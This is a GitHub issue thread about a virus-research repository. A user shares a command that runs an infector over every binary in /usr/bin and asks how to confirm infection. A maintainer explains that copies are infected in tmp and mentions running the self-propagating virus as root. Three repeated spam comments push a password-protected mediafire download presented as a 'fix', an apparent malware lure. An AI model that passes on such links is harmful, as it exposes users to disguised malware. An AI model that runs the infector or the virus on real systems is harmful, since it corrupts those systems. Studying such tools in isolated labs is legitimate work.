### ISSUE TITLE
How to confirm a victim with batch infection

### ISSUE THREAD

**Issue by minghaod** [timtianyang/vt#11]
After running the command to infect all binaries in a path, are we suppose to see `Hello World` when running any binaries under `/usr/bin/`? 
The `victim
```
bazel build //virus/... //infector:infector
# Infect all binaries in /usr/bin using the `pt_note` algorithm.
infector/infect_victims.sh /tmp/bin/virus/test_virus.text /tmp/bin/infector/infector pt_note entry_point /usr/bin/
```

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by yundddd** [comment]
Nope. The infection tool copies each binary into tmp folder then infects it, without messing with your system permanently. If you want to really F your system you can run the self propagating virus with root when the current working directory is /use/bin.

You will likely need to make a new dev container after that.

**Comment by minghaod** [comment]
ah that make sense.
